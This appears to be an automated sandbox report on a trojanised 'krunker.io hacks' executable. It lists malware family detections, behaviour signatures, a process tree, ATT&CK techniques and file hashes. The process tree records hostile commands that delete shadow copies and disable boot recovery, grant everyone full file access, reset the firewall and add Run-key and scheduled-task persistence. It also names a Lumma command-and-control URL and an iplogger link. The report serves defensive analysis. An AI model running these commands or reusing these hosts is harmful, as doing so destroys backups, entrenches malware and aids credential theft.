Resubmissions
02-09-2024 06:59
240902-hsk4hawbnd 1002-09-2024 06:58
240902-hrpqaswbmb 1002-09-2024 02:33
240902-c16ghszgkh 1016-04-2024 14:39
240416-r1ca1ace39 10Analysis
-
max time kernel
581s -
max time network
589s -
platform
windows11-21h2_x64 -
resource
win11-20231222-en -
resource tags
-
submitted
09-01-2024 22:08
General
-
Target
krunker.iohacks.exe
-
Size
30.9MB
-
MD5
2850f1cb75953d9e0232344f6a13bf48
-
SHA1
141ab8929fbe01031ab1e559d880440ae931cc16
-
SHA256
892f11af94dea87bc8a85acdb092c74541b0ab63c8fcc1823ba7987c82c6e9ba
-
SHA512
25551eb0fbca013bcebd514eb72185e157a07f116a6973bfe4b728febcefc7044a816c5c70048c3fda2eeb4ce53b52bd7b19ef1ef851a0f4fc90451e60540d6d
-
SSDEEP
786432:j8Zic+QKJObt2u8xQYcLpoTEjoAsM0D0EHShV/:j8YQzB8xQzLp+nAV0BK
Malware Config
Extracted
lumma
http://soupinterestoe.fun/api
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detect Neshta payload 9 IoCs
-
HawkEye
HawkEye is a malware kit that has seen continuous development since at least 2013.
-
Lumma Stealer
An infostealer written in C++ first seen in August 2022.
-
Maze
Ransomware family also known as ChaCha.
-
Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Ramnit
Ramnit is a versatile family that holds viruses, worms, and Trojans.
-
Troldesh, Shade, Encoder.858
Troldesh is a ransomware spread by malspam.
-
UAC bypass 3 TTPs 6 IoCs
-
Wannacry
WannaCry is a ransomware cryptoworm.
-
DCRat payload 1 IoCs
Detects payload of DCRat, commonly dropped by NSIS installers.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Downloads MZ/PE file
-
Drops file in Drivers directory 27 IoCs
-
Modifies Windows Firewall 1 TTPs 3 IoCs
-
Drops startup file 18 IoCs
-
Executes dropped EXE 64 IoCs
-
Loads dropped DLL 3 IoCs
-
Modifies file permissions 1 TTPs 2 IoCs
-
Modifies system executable filetype association 2 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
UPX packed file 11 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 10 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 4 IoCs
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops autorun.inf file 1 TTPs 4 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
-
Drops file in System32 directory 64 IoCs
-
Sets desktop wallpaper using registry 2 TTPs 4 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 64 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Kills process with taskkill 1 IoCs
-
Modifies registry class 10 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 23 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 6 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 3 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe"C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\wecker.txt.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]1⤵
- Drops startup file
- Executes dropped EXE
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\system32\netsh.exe advfirewall reset2⤵
- Modifies Windows Firewall
- Drops startup file
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\wbem\wmic.exe"C:\l\..\Windows\dslx\dyx\..\..\system32\el\ggpy\..\..\wbem\mwkh\dtstq\..\..\wmic.exe" shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\system32\netsh.exe advfirewall set allprofiles state on2⤵
- Modifies Windows Firewall
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___VV5V_.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}2⤵
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___Q1EGTJTM_.txt2⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /d /c taskkill /f /im "E" > NUL & ping -n 1 127.0.0.1 > NUL & del "C" > NUL && exit2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /c taskkill /f /im E > NUL & ping -n 1 127.0.0.1 > NUL & del C > NUL && exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im E4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\PING.EXEping -n 1 127.0.0.14⤵
- Runs ping.exe
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\alex.exeC:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\alex.exe3⤵
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe"x2s443bc.cs1.exe"1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-QAP6P.tmp\x2s443bc.cs1.tmp"C:\Users\Admin\AppData\Local\Temp\is-QAP6P.tmp\x2s443bc.cs1.tmp" /SL5="$30210,15784509,779776,C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe"2⤵
- Executes dropped EXE
-
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\61B7.tmp\61B8.tmp\61B9.bat C:\Users\Admin\Desktop\1.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/2bB2s62⤵
- Executes dropped EXE
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe" --single-argument https://iplogger.org/2bB2s63⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 184691704838826.bat1⤵
-
C:\Windows\SysWOW64\cscript.execscript.exe //nologo m.vbs2⤵
-
-
C:\Windows\SysWOW64\attrib.exeattrib +h +s F:\$RECYCLE1⤵
- Views/modifies file attributes
-
C:\Users\Admin\Desktop\10.exe"C:\Users\Admin\Desktop\10.exe"1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\icacls.exeicacls . /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\attrib.exeattrib +h .2⤵
- Views/modifies file attributes
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Executes dropped EXE
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPEX~1.EXE"1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\TEMPEX~1.EXEC:\Users\Admin\AppData\Local\TEMPEX~1.EXE2⤵
- Executes dropped EXE
- Modifies registry class
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPSP~1.EXE"1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\TEMPSP~1.EXEC:\Users\Admin\AppData\Local\TEMPSP~1.EXE2⤵
- Executes dropped EXE
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\6FD1.tmp\spwak.vbs3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\wscript.exeC:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Local\Temp\6FD1.tmp\spwak.vbs4⤵
-
-
-
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\2.doc" /o ""1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5040 -ip 50401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1304 -ip 13041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 3201⤵
- Program crash
-
C:\Users\Admin\Desktop\6.exe"C:\Users\Admin\Desktop\6.exe"1⤵
- UAC bypass
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\l41MpFgpBE.bat"2⤵
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:23⤵
-
-
C:\Program Files\Java\jdk-1.8\include\bot.exe"C:\Program Files\Java\jdk-1.8\include\bot.exe"3⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1304 -s 3241⤵
- Program crash
-
C:\Users\Admin\Desktop\8.exe"C:\Users\Admin\Desktop\8.exe"1⤵
-
C:\Users\Admin\Desktop\7.exe"C:\Users\Admin\Desktop\7.exe"1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"2⤵
- Accesses Microsoft Outlook accounts
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"2⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\Desktop\5.exe"C:\Users\Admin\Desktop\5.exe"1⤵
- Executes dropped EXE
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\PROGRA~3\system.exe"2⤵
- Executes dropped EXE
-
C:\PROGRA~3\system.exeC:\PROGRA~3\system.exe3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\ProgramData\system.exe" "system.exe" ENABLE4⤵
- Modifies Windows Firewall
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\6E2B.tmp\splitterrypted.vbs1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\wscript.exeC:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Local\Temp\6E2B.tmp\splitterrypted.vbs2⤵
- Drops file in Drivers directory
- Drops startup file
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
-
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\9.docm" /o ""1⤵
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Desktop\3.xlsx"1⤵
-
C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exeC:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe --single-argument https://iplogger.org/2bB2s61⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exeC:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exeC:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe1⤵
- Executes dropped EXE
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\as.exe"1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\as.exeC:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\as.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\is-NJVTG.tmp\ska2pwej.aeh.tmp"C:\Users\Admin\AppData\Local\Temp\is-NJVTG.tmp\ska2pwej.aeh.tmp" /SL5="$4022C,4511977,830464,C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe"1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe"C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe"1⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops autorun.inf file
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "bot" /sc ONLOGON /tr "'C:\Program Files\Java\jdk-1.8\include\bot.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Users\Admin\Desktop\1.exe"C:\Users\Admin\Desktop\1.exe"1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\icacls.exeicacls . /grant Everyone:F /T /C /Q1⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeattrib +h .1⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe"ska2pwej.aeh.exe"1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe"RIP_YOUR_PC_LOL.exe"1⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]1⤵
- Drops startup file
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
-
-
C:\Windows\SysWOW64\cmd.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "lldluhdhlxabv396" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\RarSFX0\tasksche.exe\"" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "lldluhdhlxabv396" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\RarSFX0\tasksche.exe\"" /f3⤵
- Adds Run key to start application
- Modifies registry key
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]2⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tuc2.exe"1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tuc2.exeC:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tuc2.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-I5IQQ.tmp\tuc2.tmp"C:\Users\Admin\AppData\Local\Temp\is-I5IQQ.tmp\tuc2.tmp" /SL5="$4031E,4513031,54272,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tuc2.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Send Reports Form\sendreportsform.exe"C:\Users\Admin\AppData\Local\Send Reports Form\sendreportsform.exe" -i4⤵
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" helpmsg 1934⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 helpmsg 1935⤵
-
-
-
C:\Users\Admin\AppData\Local\Send Reports Form\sendreportsform.exe"C:\Users\Admin\AppData\Local\Send Reports Form\sendreportsform.exe" -s4⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\ProgramData\Microsoft OneDrive\setup\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe"bot.exe"1⤵
- Executes dropped EXE
- Modifies system executable filetype association
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe"4363463463464363463463463.exe"1⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\lumtru.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\lumtru.exeC:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\lumtru.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6708 -s 8844⤵
- Program crash
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\alex.exe"2⤵
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "bot" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\RarSFX0\00000000\bot.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\DesktopShellAppStateContract\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004C81⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004C81⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 6708 -ip 67081⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Change Default File Association
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Change Default File Association
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1File and Directory Permissions Modification
1Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
1Disable or Modify Tools
1Indicator Removal
1File Deletion
1Modify Registry
6Scripting
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
701KB
MD5cb960c030f900b11e9025afea74f3c0c
SHA1bbdcad9527c814a9e92cdc1ee27ae9db931eb527
SHA25691a293c01eb7f038ddbc3a4caf8b4437da3f7d0abeef6b10d447127fac946b99
SHA5129ca0291caa566b2cde3d4ba4634a777a884a97c471794eff544923457e331d78f01e1e4e8b893e762a33d7bdaa0f05e8a8b8e587c903e0de9bf61c069e82f554
-
Filesize
10KB
MD52a94f3960c58c6e70826495f76d00b85
SHA1e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA2562fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
Filesize
313KB
MD5fe1bc60a95b2c2d77cd5d232296a7fa4
SHA1c07dfdea8da2da5bad036e7c2f5d37582e1cf684
SHA256b3e1e9d97d74c416c2a30dd11858789af5554cf2de62f577c13944a19623777d
SHA512266c541a421878e1e175db5d94185c991cec5825a4bc50178f57264f3556080e6fe984ed0380acf022ce659aa1ca46c9a5e97efc25ff46cbfd67b9385fd75f89
-
Filesize
1.4MB
MD563210f8f1dde6c40a7f3643ccf0ff313
SHA157edd72391d710d71bead504d44389d0462ccec9
SHA2562aab13d49b60001de3aa47fb8f7251a973faa7f3c53a3840cdf5fd0b26e9a09f
SHA51287a89e8ab85be150a783a9f8d41797cfa12f86fdccb48f2180c0498bfd2b1040b730dee4665fe2c83b98d436453680226051b7f1532e1c0e0cda0cf702e80a11
-
Filesize
92KB
MD51106972c03e704a5e316310ba69cfb3c
SHA143236560be831aca4790d7985bd5a5f20c31d888
SHA2564c4b36e24b611fb0438786721131d314a42700863ff2bb39000492eab5092f2f
SHA5124a19194fe8cb17c9036f399366ca8ecb9218864f3cca9bd73d23ca5218107bff3cd9a028c0db33221c5dc490a57b7e01ce632cd19f1ad3aa81d8ae14ffe7d4d8
-
Filesize
3.4MB
